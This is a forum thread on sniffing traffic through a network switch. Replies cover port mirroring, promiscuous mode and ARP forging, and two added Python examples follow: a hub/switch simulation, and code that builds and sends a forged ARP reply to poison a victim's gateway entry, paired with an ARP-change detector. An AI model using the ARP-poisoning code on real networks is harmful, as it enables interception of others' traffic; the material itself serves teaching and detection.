Question about packet sniffing through a switch...
I thought switches don't broadcast any packets received from one port destined to another? Unless of course it is a broadcast packet.
So how does one Computer C sniff data that Computer A sent to Computer B through a switch? It does routing through its MAC filter table, doesn't it? So Computer C shouldn't receive the data.
World Cup 2006 - Zidane - Never Forget.
Comments
-
fondue Member Posts: 104
I thought switches don't broadcast any packets received from one port destined to another? Unless of course it is a broadcast packet.
SPAN, port mirroring or port monitoring, or whatever the manufacturers want to call it, is available on most high-end managed switches. -
qsub Member Posts: 303
So pretend you had a SOHO switch, a basic 4-port one. Data from PC A to PC B can't be sniffed by PC 3?
I thought if your NIC supported something called "promiscuous mode" or along those lines, it allows you to. But I don't understand how that would exactly work.
World Cup 2006 - Zidane - Never Forget. -
Webmaster Admin Posts: 10,292
spfdz wrote: I thought if your NIC supported something called "promiscuous mode" or along those lines, it allows you to. But I don't understand how that would exactly work.
No, PC3 would not be able to sniff traffic between PC1 and PC2 with a NIC in promiscuous mode. The term broadcast in this scenario does not relate to broadcasts sent to the IP broadcast address, but to Ethernet being a broadcast network technology. In a non-switched network, all network nodes hear all traffic (layer 2 frames), but only process frames addressed to themselves (unless a node has its NIC in promiscuous mode, in which case it processes all traffic it hears, even if the destination address doesn't match its own). In a switched network, devices only hear traffic actually addressed to them (or to everyone through a broadcast address), but not communication between nodes connected to other switch ports. Putting the NIC in promiscuous mode wouldn't change a thing because it just doesn't get the traffic on its cable/switch port.
The Switches section in my Security+ Network Devices TechNotes explains it in more detail:
www.techexams.net/technotes/securityplus/network_devices_security.shtml
The Monitoring section on the same page is relevant as well. -
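To make the Webmaster's point concrete, here is a small added model (not code from the thread or from the TechNotes page) of a hub, a learning switch and a NIC filter. All MAC addresses and port numbers are constructed for the example. It shows the case the thread describes (PC3 in promiscuous mode hears nothing on a switch once the switch knows PC2's port) and one nuance the thread does not mention: before the switch has learned PC2's MAC, the unknown-unicast frame is flooded to every port and PC3 does see it.

```python
"""Toy model of a hub vs. a learning switch (added example, not from the thread).
Hosts, MACs and port numbers below are constructed for illustration."""
from typing import Dict, List, Tuple

BROADCAST = "ff:ff:ff:ff:ff:ff"
Frame = Tuple[str, str]  # (src_mac, dst_mac); payload omitted


class Hub:
    """Repeater: every frame is copied to every port except the one it came in on."""

    def __init__(self, ports):
        self.ports = list(ports)

    def forward(self, in_port: int, src: str, dst: str) -> List[int]:
        return [p for p in self.ports if p != in_port]


class LearningSwitch:
    """Transparent bridge: learns src MAC -> ingress port, forwards known unicast
    out one port only, floods broadcast and unknown-unicast frames."""

    def __init__(self, ports):
        self.ports = list(ports)
        self.mac_table: Dict[str, int] = {}   # the "MAC filter table" from the question

    def forward(self, in_port: int, src: str, dst: str) -> List[int]:
        self.mac_table[src] = in_port
        if dst == BROADCAST or dst not in self.mac_table:
            return [p for p in self.ports if p != in_port]   # flood
        return [self.mac_table[dst]]                           # single egress port


class Host:
    def __init__(self, mac: str, promiscuous: bool = False):
        self.mac = mac
        self.promiscuous = promiscuous
        self.captured: List[Frame] = []

    def receive(self, src: str, dst: str) -> None:
        # NIC hardware filter: a normal NIC discards frames not addressed to it;
        # promiscuous mode passes everything that arrives on the wire up the stack.
        if self.promiscuous or dst in (self.mac, BROADCAST):
            self.captured.append((src, dst))


def send(device, hosts: Dict[int, Host], in_port: int, src: str, dst: str) -> None:
    for p in device.forward(in_port, src, dst):
        hosts[p].receive(src, dst)


def frames_seen_by_pc3(device_cls, switch_knows_pc2: bool) -> int:
    """PC1 sends one unicast frame to PC2; return how many copies PC3 (promiscuous) captures."""
    macs = {1: "02:00:00:00:00:01", 2: "02:00:00:00:00:02", 3: "02:00:00:00:00:03"}
    hosts = {1: Host(macs[1]), 2: Host(macs[2]), 3: Host(macs[3], promiscuous=True)}
    dev = device_cls(hosts.keys())
    if switch_knows_pc2:
        # PC2 has already transmitted something (e.g. an ARP reply), so a
        # switch has its MAC in the table before PC1's frame arrives.
        send(dev, hosts, 2, macs[2], BROADCAST)
    send(dev, hosts, 1, macs[1], macs[2])
    return hosts[3].captured.count((macs[1], macs[2]))


if __name__ == "__main__":
    print("hub:", frames_seen_by_pc3(Hub, True))                              # 1
    print("switch, PC2 learned:", frames_seen_by_pc3(LearningSwitch, True))   # 0
    print("switch, PC2 unknown:", frames_seen_by_pc3(LearningSwitch, False))  # 1 (flooded)
```

The model deliberately leaves out MAC table ageing; on a real switch an entry expires after a few minutes of silence, after which the next frame to that host is flooded again until the host speaks.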
seuss_ssues Member Posts: 629
Sniffing on a switch is possible but is not as easy as sniffing off of a hub. There are several things that can be done to accomplish the task and a good read about the subject is here.
http://www.sans.org/resources/idfaq/switched_network.php
It's really not that difficult to do, and too many people put faith in the idea that "we're using switches so we are safe". -
Webmaster Admin Posts: 10,292
seuss_ssues wrote: "we're using switches so we are safe"
Yes, there are other ways to sniff in switched networks; however, simply placing a NIC in promiscuous mode will not allow PC3 to sniff traffic between PC1 and PC2.
-
mikeyoung Member Posts: 101
Fondue actually answered the question, but I don't know if everyone got it. You sniff on a switch by mirroring or monitoring (Cisco's term) a specific port, several ports or a VLAN. Pretty simple to do really.
Mike
Lack of will power has caused more failure than lack of intelligence or ability. -
seuss_ssues Member Posts: 629
Generally port mirroring is used by the administrator, or the individual in control of the switch, to "monitor" network activity. Yes, you could mirror a port, set a NIC into promiscuous mode and sniff the traffic for that port or all ports. But an attacker will probably not have the ability to mirror ports. Also, many switches, such as all the little Linksys cable/DSL routers, do not, to my knowledge, allow port mirroring.
So Fondue gave one example of how it could be done, while the link that I gave talked about several more. Just as with almost everything associated with computers, there are several methods of doing something.
But as the Webmaster stated, for most certifications one of the advantages of a switch is that it is unsniffable. -
keatron Member Posts: 1,213
We can't leave out ARP in this discussion. Forging ARP packets is one of the more common ways to do this. PC3 could send a forged packet to PC1, telling it that its default gateway has changed to PC3, for example. PC3 then forwards the packets to PC2 as if nothing ever happened. This way, whenever PC1 sends traffic on the network, it will send it to PC3 first, which then forwards the packet on to its original destination. This is very very easy to do from a Linux box if you know how to use kernel-level IP forwarding. And for those who are lazy, Dsniff makes it even easier, however this method (as is the case with most out of the box tools) is not very "quiet".
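As an added example of the ARP trick keatron describes (this is not code from the thread, from Dsniff, or from the SANS link), the block below builds the forged "gateway is now at PC3" ARP reply byte for byte, decodes it back, and on the defender side keeps an IP-to-MAC table and raises an alert when an IP suddenly claims a new MAC, which is the trace that makes this method not very "quiet". IP and MAC addresses and the interface name are constructed; `send_frame()` uses a Linux AF_PACKET raw socket and is not called by the demo, and the relay half keatron mentions is only the one `sysctl` noted in its comment.

```python
"""Forged ARP reply plus an IP->MAC change monitor (added example, not from the thread).
Addresses and the interface name are constructed; send_frame() only works as root on
Linux with a real interface and is not invoked by demo()."""
import socket
import struct
from typing import Dict, List, Optional

ETH_P_ARP = 0x0806


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet + ARP 'reply' claiming sender_ip is at sender_mac, unicast to target.
    PC3 poisons PC1 by sending this with sender_ip = gateway IP, sender_mac = PC3's MAC."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)   # Ethernet, IPv4, hlen 6, plen 4, opcode 2
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)
    return eth + arp


def parse_arp(frame: bytes) -> Optional[Dict[str, object]]:
    """Decode the ARP fields of an Ethernet frame; None if it is not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    _htype, _ptype, _hlen, _plen, oper = struct.unpack("!HHBBH", frame[14:22])
    return {
        "oper": oper,
        "sha": mac_str(frame[22:28]), "spa": socket.inet_ntoa(frame[28:32]),
        "tha": mac_str(frame[32:38]), "tpa": socket.inet_ntoa(frame[38:42]),
    }


def send_frame(iface: str, frame: bytes) -> None:
    """Put a raw frame on the wire (Linux AF_PACKET, needs CAP_NET_RAW). Not run by demo().
    For PC3 to relay PC1's traffic onward it also needs: sysctl -w net.ipv4.ip_forward=1"""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        s.send(frame)


class ArpWatch:
    """Defender side: remember IP->MAC from every ARP seen and flag a change,
    which is the signature a forged 'gateway moved' reply leaves behind."""

    def __init__(self):
        self.table: Dict[str, str] = {}

    def observe(self, arp: Dict[str, object]) -> Optional[str]:
        ip, mac = str(arp["spa"]), str(arp["sha"])
        old = self.table.get(ip)
        self.table[ip] = mac
        if old is not None and old != mac:
            return f"ALERT: {ip} was {old}, now claims {mac}"
        return None


def demo() -> List[str]:
    """Legitimate gateway reply followed by PC3's forgery; returns the monitor's alerts."""
    gw_ip, gw_mac = "192.168.1.1", "02:00:00:00:00:fe"     # constructed addresses
    pc1_ip, pc1_mac = "192.168.1.10", "02:00:00:00:00:01"
    pc3_mac = "02:00:00:00:00:03"                          # the attacker, PC3
    legit = build_arp_reply(gw_mac, gw_ip, pc1_mac, pc1_ip)
    forged = build_arp_reply(pc3_mac, gw_ip, pc1_mac, pc1_ip)   # "the gateway is now at PC3"
    watch = ArpWatch()
    alerts = []
    for frame in (legit, forged):
        alert = watch.observe(parse_arp(frame))
        if alert is not None:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for line in demo():
        print(line)
```

A real poisoner has to repeat the forged reply every few seconds, because the victim's ARP cache entry expires and the real gateway's traffic keeps correcting it; that repetition is exactly what a monitor like the one above, or a switch with dynamic ARP inspection, catches.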